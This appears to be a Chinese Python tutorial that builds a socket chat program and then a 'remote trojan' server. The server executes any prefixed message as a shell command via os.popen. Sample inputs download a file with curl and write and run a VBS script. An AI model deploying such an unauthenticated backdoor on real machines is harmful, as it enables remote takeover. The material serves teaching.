【Python与AI基础】Python编程基础:基于Socket实现远程木马
一、实现Socket完整交互
一个完整的交互,必须要有客户端和服务器端两个程序,在Python中建议新建两个源文件进行处理。
1、server.py
import socket
s = socket.socket()
# s.bind(('127.0.0.1', 6666)) # 只允许本设备访问
s.bind(('0.0.0.0', 6666)) # 所有IP地址均可以访问6666端口
s.listen()
chanel, client = s.accept() # 无法接受多个客户端
while True:
# chanel, client = s.accept() # 此时accept()会进入阻塞状态
receive = chanel.recv(1024).decode()
print(f"收到消息:{receive}")
reply = receive.replace("吗?", "!")
chanel.send(reply.encode())
# s.close() # 在死循环之后的代码,不可执行
2、client.py
import socket
s = socket.socket()
s.connect(('127.0.0.1', 6666))
while True:
messge = input("请输入消息:")
s.send(messge.encode())
receive = s.recv(1024)
print(f"服务器回复:{receive.decode()}")
3、执行结果
二、实现Socket远程木马
核心思路:客户端发送一条特殊字符串,里面包含要执行的命令,让服务器端执行该命令并返回结果给客户端,直接修改server.py
def attack_talk():
try:
s = socket.socket()
s.bind(('0.0.0.0', 6666))
s.listen()
chanel, client = s.accept()
while True:
receive = chanel.recv(1024).decode()
# ==##==,command
if receive.startswith('==##=='):
command = receive.split(',')[-1]
reply = os.popen(command).read()
chanel.send(f"命令{command}的运行结果:\n{reply}".encode())
else:
print(f"收到消息:{receive}")
reply = receive.replace("吗?", "!")
chanel.send(reply.encode())
except:
s.close()
attack_talk()
在客户端输入如下聊天内容进行测试:
请输入消息:Hello
服务器回复:Hello
请输入消息:==##==,ipconfig # 执行ipconfigf命令
请输入消息:==##==,curl http://www.woniuxy.com/page/img/banner/class_time_home.png > D:\home.png # 下载
请输入消息:==##==,echo msgbox("你中招了") > D:\hi.vbs # 模拟写入攻击脚本
请输入消息:==##==,D:\hi.vbs # 模拟执行攻击脚本
